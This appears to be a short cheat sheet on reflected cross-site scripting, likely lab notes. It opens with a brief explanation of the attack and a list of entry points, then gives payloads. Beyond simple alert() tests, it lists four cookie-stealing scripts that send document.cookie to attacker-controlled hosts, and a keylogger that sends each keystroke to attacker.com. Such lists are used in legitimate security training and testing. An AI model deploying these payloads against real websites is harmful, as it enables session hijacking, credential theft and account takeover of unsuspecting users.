XSS Reflected

Reflected XSS

This starts by an attacker crafting a malicious email and then encouraging a user to click it. The malicious URL is often placed within a phishing email, but it could also be placed on a public website, such as a link within a comment. When the user clicks the malicious URL, it sends an HTTP request to a server with the user's cookie which the attacker can use to hijack the user/admin account through what's called session hijacking. To summarize, an attacker needs to trick a victim into clicking a URL to execute their malicious payload.

Entry points

• Parameters in the URL Query String

• URL File Path

• Sometimes HTTP Headers

• Search Fields

• Comments section

• Contact Forms

Example Payloads

JS

<script>alert("Hello")</script>

<script>alert(window.location.hostname)</script>

"><script>alert('XSS');</script> 
[suitable for escaping input tags]

<textarea><script>alert('THM');</script>
[suitable for escaping text areas]

';alert('Hi_There');//'

Cookie Stealer

[1] JS

<script>fetch('http://10.8.133.250:8000/steal?cookie=' + btoa(document.cookie));</script>

[2] JS

<script>window.location='http://10.8.133.250:8000/cookie?'+document.cookie;</script>

[3] JS

<script>var myimg = new Image(); myimg.src = 'http://10.14.2.200/q?a=' + document.cookie;</script>

[4] JS

<script>document.location='http://ip:8000/XSS/grabber.php?c='+document.cookie;</script>

Keylogger

<script>document.onkeypress = 
    function(e) {
        fetch('http://attacker.com/log?key=' + btoa(e.key));
    }</script>